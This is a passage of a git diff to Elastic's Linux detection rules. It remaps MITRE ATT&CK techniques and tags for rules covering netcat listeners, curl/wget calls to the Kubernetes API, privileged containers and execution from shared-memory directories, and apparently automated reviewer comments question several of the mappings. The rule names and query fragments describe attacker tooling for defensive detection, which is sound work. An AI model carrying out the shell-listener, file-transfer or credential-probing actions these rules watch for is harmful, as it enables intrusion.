"Ingress Tool Transfer" +reference = "https://attack.mitre.org/techniques/T1105/" + +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1070" +name = "Indicator Removal" +reference = "https://attack.mitre.org/techniques/T1070/" + +[[rule.threat.technique.subtechnique]] +id = "T1070.004" +name = "File Deletion" +reference = "https://attack.mitre.org/techniques/T1070/004/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" 
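Review bot: The new T1105 (Ingress Tool Transfer) entry asserts a download the rule does not visibly observe: the query start `sequence by host.id, user.id with maxspan=1m` and the rule name describe execution followed by deletion, not a transfer. Unless the first step of the sequence (outside this hunk) is a network or file-creation event from a downloader, the Command and Control mapping and the `Tactic: Command and Control` tag in the hunk above overstate what fires the alert. The T1070.004 (File Deletion) entry is the well-grounded part of this change and matches the rule's second step.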
diff --git a/rules/linux/execution_file_made_executable_via_chmod_inside_container.toml b/rules/linux/execution_file_made_executable_via_chmod_inside_container.toml index 18431eba5ca..79c6860fe6c 100644 --- a/rules/linux/execution_file_made_executable_via_chmod_inside_container.toml +++ b/rules/linux/execution_file_made_executable_via_chmod_inside_container.toml @@ -2,7 +2,7 @@ creation_date = "2025/03/12" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/18" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -79,15 +79,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "low" -tags = [ - "Domain: Container", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Execution", - "Tactic: Defense Evasion", - "Data Source: Elastic Defend", - "Resources: Investigation Guide", -] +tags = ["Domain: Container", "OS: Linux", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Data Source: Elastic Defend", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -100,19 +92,6 @@ process.args like ("/dev/shm/*", "/tmp/*", "/var/tmp/*", "/run/*", "/var/run/*", [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1222" name = "File and Directory Permissions Modification" diff --git a/rules/linux/execution_file_transfer_or_listener_established_via_netcat.toml b/rules/linux/execution_file_transfer_or_listener_established_via_netcat.toml index 59cdf65a41e..717371ec75b 100644 
--- a/rules/linux/execution_file_transfer_or_listener_established_via_netcat.toml +++ b/rules/linux/execution_file_transfer_or_listener_established_via_netcat.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" integration = ["endpoint", "auditd_manager", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/10/15" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -116,18 +116,7 @@ Auditbeat is a lightweight shipper that you can install on your servers to audit - For complete “Setup and Run Auditbeat” information refer to the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setting-up-and-running.html). """ severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Execution", - "Resources: Investigation Guide", - "Data Source: Elastic Defend", - "Data Source: Elastic Endgame", - "Data Source: Auditd Manager", - "Data Source: Crowdstrike", - "Data Source: SentinelOne", -] +tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Command and Control", "Tactic: Execution", "Tactic: Exfiltration", "Resources: Investigation Guide", "Data Source: Elastic Defend", "Data Source: Elastic Endgame", "Data Source: Auditd Manager", "Data Source: Crowdstrike", "Data Source: SentinelOne"] timestamp_override = "event.ingested" type = "eql" query = ''' 
@@ -147,6 +136,24 @@ process.args like~ ( [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1095" +name = "Non-Application Layer Protocol" +reference = "https://attack.mitre.org/techniques/T1095/" + +[[rule.threat.technique]] +id = "T1105" +name = "Ingress Tool Transfer" +reference = "https://attack.mitre.org/techniques/T1105/" + +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" @@ -161,3 +168,16 @@ reference = "https://attack.mitre.org/techniques/T1059/004/" id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1048" +name = "Exfiltration Over Alternative Protocol" +reference = "https://attack.mitre.org/techniques/T1048/" + +[rule.threat.tactic] +id = "TA0010" +name = "Exfiltration" +reference = "https://attack.mitre.org/tactics/TA0010/" diff --git a/rules/linux/execution_kubectl_apply_pod_from_url.toml b/rules/linux/execution_kubectl_apply_pod_from_url.toml index 7358ddd13d1..28f2960a711 100644 --- a/rules/linux/execution_kubectl_apply_pod_from_url.toml +++ b/rules/linux/execution_kubectl_apply_pod_from_url.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel", "auditd_m maturity = "production" min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" min_stack_version = "9.3.0" -updated_date = "2026/02/05" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
@@ -116,16 +116,16 @@ not process.args like~ ("*download.elastic.co*", "*github.com/kubernetes-sigs/*" [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1610" -name = "Deploy Container" -reference = "https://attack.mitre.org/techniques/T1610/" - [[rule.threat.technique]] id = "T1609" name = "Container Administration Command" reference = "https://attack.mitre.org/techniques/T1609/" +[[rule.threat.technique]] +id = "T1610" +name = "Deploy Container" +reference = "https://attack.mitre.org/techniques/T1610/" + [rule.threat.tactic] id = "TA0002" name = "Execution" diff --git a/rules/linux/execution_kubernetes_direct_api_request_via_curl_or_wget.toml b/rules/linux/execution_kubernetes_direct_api_request_via_curl_or_wget.toml index 15462abd9f1..228072a8a57 100644 --- a/rules/linux/execution_kubernetes_direct_api_request_via_curl_or_wget.toml +++ b/rules/linux/execution_kubernetes_direct_api_request_via_curl_or_wget.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel", "auditd_m maturity = "production" min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" min_stack_version = "9.3.0" -updated_date = "2026/02/05" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
@@ -91,22 +91,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "medium" -tags = [ - "Domain: Endpoint", - "Domain: Container", - "Domain: Kubernetes", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Execution", - "Tactic: Discovery", - "Data Source: Auditd Manager", - "Data Source: Elastic Defend", - "Data Source: Elastic Endgame", - "Data Source: Crowdstrike", - "Data Source: SentinelOne", - "Data Source: Elastic Defend for Containers", - "Resources: Investigation Guide" -] +tags = ["Domain: Endpoint", "Domain: Container", "Domain: Kubernetes", "OS: Linux", "Use Case: Threat Detection", "Tactic: Credential Access", "Tactic: Discovery", "Data Source: Auditd Manager", "Data Source: Elastic Defend", "Data Source: Elastic Endgame", "Data Source: Crowdstrike", "Data Source: SentinelOne", "Data Source: Elastic Defend for Containers", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -127,19 +112,19 @@ process.name in ("curl", "wget") and process.args like~ ( framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" +id = "T1552" +name = "Unsecured Credentials" +reference = "https://attack.mitre.org/techniques/T1552/" [[rule.threat.technique.subtechnique]] -id = "T1059.004" -name = "Unix Shell" -reference = "https://attack.mitre.org/techniques/T1059/004/" +id = "T1552.007" +name = "Container API" +reference = "https://attack.mitre.org/techniques/T1552/007/" [rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" +id = "TA0006" +name = "Credential Access" +reference = "https://attack.mitre.org/tactics/TA0006/" [[rule.threat]] framework = "MITRE ATT&CK" 
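Review bot: The new Credential Access mapping asserts more than the detection observes: T1552.007 (Container API) covers reading credentials through the container or orchestration API, whereas the hunk header shows the rule keys on `curl`/`wget` with API-looking arguments, which plain API enumeration triggers just as well. The second `[[rule.threat]]` entry left in context at the end of the hunk (Discovery, per the tags line) already captures the enumeration case, so the Credential Access entry only holds up if the query restricts the request path to secret-bearing endpoints; the query body is outside this hunk, so I cannot confirm that. If it does not, consider keeping only the Discovery mapping and dropping `Tactic: Credential Access` from the tags hunk above.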
diff --git a/rules/linux/execution_nc_listener_via_rlwrap.toml b/rules/linux/execution_nc_listener_via_rlwrap.toml index 7e6e8f09bbf..0e630db8bb7 100644 --- a/rules/linux/execution_nc_listener_via_rlwrap.toml +++ b/rules/linux/execution_nc_listener_via_rlwrap.toml @@ -2,7 +2,7 @@ creation_date = "2023/09/22" integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/18" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -91,17 +91,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Execution", - "Data Source: Elastic Defend", - "Data Source: Elastic Endgame", - "Data Source: Crowdstrike", - "Data Source: SentinelOne", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Command and Control", "Data Source: Elastic Defend", "Data Source: Elastic Endgame", "Data Source: Crowdstrike", "Data Source: SentinelOne", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" query = ''' 
@@ -115,16 +105,11 @@ process where host.os.type == "linux" and event.type == "start" and framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" - -[[rule.threat.technique.subtechnique]] -id = "T1059.004" -name = "Unix Shell" -reference = "https://attack.mitre.org/techniques/T1059/004/" +id = "T1095" +name = "Non-Application Layer Protocol" +reference = "https://attack.mitre.org/techniques/T1095/" [rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" diff --git a/rules/linux/execution_netcon_from_rwx_mem_region_binary.toml b/rules/linux/execution_netcon_from_rwx_mem_region_binary.toml index b094488daa9..3ad4d30131f 100644 --- a/rules/linux/execution_netcon_from_rwx_mem_region_binary.toml +++ b/rules/linux/execution_netcon_from_rwx_mem_region_binary.toml @@ -2,7 +2,7 @@ creation_date = "2024/03/13" integration = ["auditd_manager", "endpoint"] maturity = "production" -updated_date = "2025/12/18" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -43,15 +43,7 @@ For this detection rule to trigger, the following additional audit rules are req Add the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable. """ severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Execution", - "Data Source: Elastic Defend", - "Data Source: Auditd Manager", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Execution", "Data Source: Elastic Defend", "Data Source: Auditd Manager", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" query = ''' 
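Review bot: This rule now carries only a Command and Control entry (T1095), while `execution_file_transfer_or_listener_established_via_netcat.toml` earlier in this patch keeps T1059.004 under Execution next to its T1095/T1105 entries for the same kind of listener. Both rules fire on the netcat process start, so either both observe Execution or neither does; the asymmetry will show up in ATT&CK coverage reporting as one netcat rule contributing to Execution and the other not. If the `rlwrap` wrapper is the reason the shell is considered out of scope here, a sentence in the rule's investigation guide explaining that would save the next reviewer the same question.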
@@ -102,29 +94,24 @@ In Linux environments, the `mprotect()` system call adjusts memory permissions, framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" - -[[rule.threat.technique.subtechnique]] -id = "T1059.004" -name = "Unix Shell" -reference = "https://attack.mitre.org/techniques/T1059/004/" +id = "T1620" +name = "Reflective Code Loading" +reference = "https://attack.mitre.org/techniques/T1620/" [rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" [[rule.threat]] framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1071" -name = "Application Layer Protocol" -reference = "https://attack.mitre.org/techniques/T1071/" +id = "T1106" +name = "Native API" +reference = "https://attack.mitre.org/techniques/T1106/" [rule.threat.tactic] -id = "TA0011" -name = "Command and Control" -reference = "https://attack.mitre.org/tactics/TA0011/" +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/linux/execution_network_event_post_compilation.toml b/rules/linux/execution_network_event_post_compilation.toml index 42342789d2f..1ab588e751b 100644 --- a/rules/linux/execution_network_event_post_compilation.toml +++ b/rules/linux/execution_network_event_post_compilation.toml @@ -2,7 +2,7 @@ creation_date = "2023/08/28" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/18" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
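Review bot: The Command and Control entry is removed entirely, yet the event that names this rule is the network connection from a binary with an RWX memory region (the hunk header still talks about `mprotect()`), so the egress the rule alerts on is no longer mapped to any tactic. T1620 and T1106 describe how the code got into memory and ran, not the connection; if the query still requires a network event, keep a C2 entry (T1071 was the previous choice) alongside the new ones and restore `Tactic: Command and Control` in the tags hunk above. If the sequence no longer includes the connection, the new mapping is fine as is — the query is outside this hunk, so I cannot tell which applies.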
@@ -44,14 +44,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Execution", - "Data Source: Elastic Defend", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Command and Control", "Tactic: Defense Evasion", "Data Source: Elastic Defend", "Resources: Investigation Guide"] type = "eql" query = ''' sequence by host.id with maxspan=1m 
@@ -113,29 +106,29 @@ In Linux environments, compiling and executing programs is routine for developme framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" - -[[rule.threat.technique.subtechnique]] -id = "T1059.004" -name = "Unix Shell" -reference = "https://attack.mitre.org/techniques/T1059/004/" +id = "T1095" +name = "Non-Application Layer Protocol" +reference = "https://attack.mitre.org/techniques/T1095/" [rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" [[rule.threat]] framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1071" -name = "Application Layer Protocol" -reference = "https://attack.mitre.org/techniques/T1071/" +id = "T1027" +name = "Obfuscated Files or Information" +reference = "https://attack.mitre.org/techniques/T1027/" + +[[rule.threat.technique.subtechnique]] +id = "T1027.004" +name = "Compile After Delivery" +reference = "https://attack.mitre.org/techniques/T1027/004/" [rule.threat.tactic] -id = "TA0011" -name = "Command and Control" -reference = "https://attack.mitre.org/tactics/TA0011/" +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/linux/execution_perl_tty_shell.toml b/rules/linux/execution_perl_tty_shell.toml index fdf0986337e..24093ae8322 100644 --- a/rules/linux/execution_perl_tty_shell.toml +++ b/rules/linux/execution_perl_tty_shell.toml @@ -2,7 +2,7 @@ creation_date = "2020/04/16" integration = ["endpoint", "auditd_manager", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/19" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
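Review bot: Swapping T1071 for T1095 changes the asserted protocol layer without any new evidence: a network event observed shortly after compilation tells the rule nothing about whether the traffic is application-layer or not, so the new C2 technique is as much a guess as the old one. The T1027.004 (Compile After Delivery) entry is well grounded by the rule's sequence and is the real improvement here. For the C2 entry, pick whichever technique the query's port or protocol filter (outside this hunk) actually supports, or leave a short comment in the rule explaining why T1095 was chosen over T1071.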
@@ -130,6 +130,11 @@ id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" +[[rule.threat.technique.subtechnique]] +id = "T1059.004" +name = "Unix Shell" +reference = "https://attack.mitre.org/techniques/T1059/004/" + [rule.threat.tactic] id = "TA0002" name = "Execution" diff --git a/rules/linux/execution_potential_hack_tool_executed.toml b/rules/linux/execution_potential_hack_tool_executed.toml index c3d550b7b8b..d875a90451b 100644 --- a/rules/linux/execution_potential_hack_tool_executed.toml +++ b/rules/linux/execution_potential_hack_tool_executed.toml @@ -2,7 +2,7 @@ creation_date = "2023/09/22" integration = ["endpoint", "auditd_manager", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -87,18 +87,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Execution", - "Data Source: Elastic Endgame", - "Data Source: Elastic Defend", - "Data Source: Auditd Manager", - "Data Source: Crowdstrike", - "Data Source: SentinelOne", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Credential Access", "Tactic: Discovery", "Tactic: Initial Access", "Tactic: Reconnaissance", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Auditd Manager", "Data Source: Crowdstrike", "Data Source: SentinelOne", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" 
@@ -128,8 +117,86 @@ process.name in~ ( [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1110" +name = "Brute Force" +reference = "https://attack.mitre.org/techniques/T1110/" + +[[rule.threat.technique.subtechnique]] +id = "T1110.001" +name = "Password Guessing" +reference = "https://attack.mitre.org/techniques/T1110/001/" + +[[rule.threat.technique.subtechnique]] +id = "T1110.002" +name = "Password Cracking" +reference = "https://attack.mitre.org/techniques/T1110/002/" + +[rule.threat.tactic] +id = "TA0006" +name = "Credential Access" +reference = "https://attack.mitre.org/tactics/TA0006/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1046" +name = "Network Service Discovery" +reference = "https://attack.mitre.org/techniques/T1046/" + +[[rule.threat.technique]] +id = "T1057" +name = "Process Discovery" +reference = "https://attack.mitre.org/techniques/T1057/" + +[[rule.threat.technique]] +id = "T1082" +name = "System Information Discovery" +reference = "https://attack.mitre.org/techniques/T1082/" + +[rule.threat.tactic] +id = "TA0007" +name = "Discovery" +reference = "https://attack.mitre.org/tactics/TA0007/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1190" +name = "Exploit Public-Facing Application" +reference = "https://attack.mitre.org/techniques/T1190/" + [rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1595" +name = "Active Scanning" +reference = "https://attack.mitre.org/techniques/T1595/" + +[[rule.threat.technique.subtechnique]] +id = "T1595.001" +name = "Scanning IP Blocks" +reference = "https://attack.mitre.org/techniques/T1595/001/" + +[[rule.threat.technique.subtechnique]] +id = "T1595.002" +name = 
"Vulnerability Scanning" +reference = "https://attack.mitre.org/techniques/T1595/002/" + +[[rule.threat.technique.subtechnique]] +id = "T1595.003" +name = "Wordlist Scanning" +reference = "https://attack.mitre.org/techniques/T1595/003/" + +[rule.threat.tactic] +id = "TA0043" +name = "Reconnaissance" +reference = "https://attack.mitre.org/tactics/TA0043/" diff --git a/rules/linux/execution_potentially_overly_permissive_container_creation.toml b/rules/linux/execution_potentially_overly_permissive_container_creation.toml index 69ded33a6ec..2fcd60481d8 100644 --- a/rules/linux/execution_potentially_overly_permissive_container_creation.toml +++ b/rules/linux/execution_potentially_overly_permissive_container_creation.toml @@ -2,7 +2,7 @@ creation_date = "2024/07/10" integration = ["endpoint", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/18" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -85,17 +85,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "medium" -tags = [ - "Domain: Endpoint", - "Domain: Container", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Execution", - "Data Source: Elastic Defend", - "Data Source: Elastic Endgame", - "Data Source: SentinelOne", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "Domain: Container", "OS: Linux", "Use Case: Threat Detection", "Tactic: Execution", "Tactic: Privilege Escalation", "Data Source: Elastic Defend", "Data Source: Elastic Endgame", "Data Source: SentinelOne", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "new_terms" query = ''' 
@@ -107,16 +97,6 @@ process.name:docker and process.args:(run and --privileged) [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" - -[[rule.threat.technique.subtechnique]] -id = "T1059.004" -name = "Unix Shell" -reference = "https://attack.mitre.org/techniques/T1059/004/" - [[rule.threat.technique]] id = "T1609" name = "Container Administration Command" @@ -139,7 +119,6 @@ reference = "https://attack.mitre.org/techniques/T1611/" id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" - [rule.new_terms] field = "new_terms_fields" value = ["process.parent.executable"] diff --git a/rules/linux/execution_process_backgrounded_by_unusual_parent.toml b/rules/linux/execution_process_backgrounded_by_unusual_parent.toml index b89fc96dc27..535e1497a84 100644 --- a/rules/linux/execution_process_backgrounded_by_unusual_parent.toml +++ b/rules/linux/execution_process_backgrounded_by_unusual_parent.toml @@ -2,7 +2,7 @@ creation_date = "2025/01/29" integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/18" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
@@ -94,18 +94,7 @@ Auditbeat is a lightweight shipper that you can install on your servers to audit - For complete “Setup and Run Auditbeat” information refer to the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setting-up-and-running.html). """ severity = "low" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Execution", - "Tactic: Persistence", - "Data Source: Elastic Endgame", - "Data Source: Elastic Defend", - "Data Source: Crowdstrike", - "Data Source: SentinelOne", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Execution", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Crowdstrike", "Data Source: SentinelOne", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "new_terms" query = ''' 
@@ -120,28 +109,37 @@ not process.parent.name:(sshd or make or su or ds_agent or fortitraylauncher or framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" +id = "T1036" +name = "Masquerading" +reference = "https://attack.mitre.org/techniques/T1036/" + +[[rule.threat.technique.subtechnique]] +id = "T1036.009" +name = "Break Process Trees" +reference = "https://attack.mitre.org/techniques/T1036/009/" [rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" [[rule.threat]] framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1564" -name = "Hide Artifacts" -reference = "https://attack.mitre.org/techniques/T1564/" +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat.technique.subtechnique]] +id = "T1059.004" +name = "Unix Shell" +reference = "https://attack.mitre.org/techniques/T1059/004/" +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" [rule.new_terms] field = "new_terms_fields" value = ["process.parent.name"] diff --git a/rules/linux/execution_process_started_from_process_id_file.toml b/rules/linux/execution_process_started_from_process_id_file.toml index 9188badd565..121dd0f3510 100644 --- a/rules/linux/execution_process_started_from_process_id_file.toml +++ b/rules/linux/execution_process_started_from_process_id_file.toml @@ -2,7 +2,7 @@ creation_date = "2022/05/11" integration = ["endpoint", "auditd_manager", "crowdstrike"] maturity = "production" -updated_date = "2025/02/04" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
@@ -65,18 +65,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "high" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Execution", - "Threat: BPFDoor", - "Data Source: Elastic Endgame", - "Data Source: Elastic Defend", - "Data Source: Auditd Manager", - "Data Source: Crowdstrike", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Threat: BPFDoor", "Tactic: Defense Evasion", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Auditd Manager", "Data Source: Crowdstrike", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" @@ -88,14 +77,18 @@ process where host.os.type == "linux" and event.type == "start" and user.id == " [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" +id = "T1036" +name = "Masquerading" +reference = "https://attack.mitre.org/techniques/T1036/" +[[rule.threat.technique.subtechnique]] +id = "T1036.008" +name = "Masquerade File Type" +reference = "https://attack.mitre.org/techniques/T1036/008/" [rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" - +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/linux/execution_process_started_in_shared_memory_directory.toml b/rules/linux/execution_process_started_in_shared_memory_directory.toml index 1f0801f42f1..856d4737fb0 100644 --- a/rules/linux/execution_process_started_in_shared_memory_directory.toml +++ b/rules/linux/execution_process_started_in_shared_memory_directory.toml 
@@ -2,7 +2,7 @@ creation_date = "2022/05/10" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/18" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -56,16 +56,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "high" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Execution", - "Threat: BPFDoor", - "Data Source: Elastic Endgame", - "Data Source: Elastic Defend", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Threat: BPFDoor", "Tactic: Defense Evasion", "Tactic: Execution", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -120,9 +111,22 @@ Shared memory directories in Linux, such as /dev/shm and /run/shm, are designed framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" +id = "T1564" +name = "Hide Artifacts" +reference = "https://attack.mitre.org/techniques/T1564/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1106" +name = "Native API" +reference = "https://attack.mitre.org/techniques/T1106/" [rule.threat.tactic] id = "TA0002" diff --git a/rules/linux/execution_python_tty_shell.toml 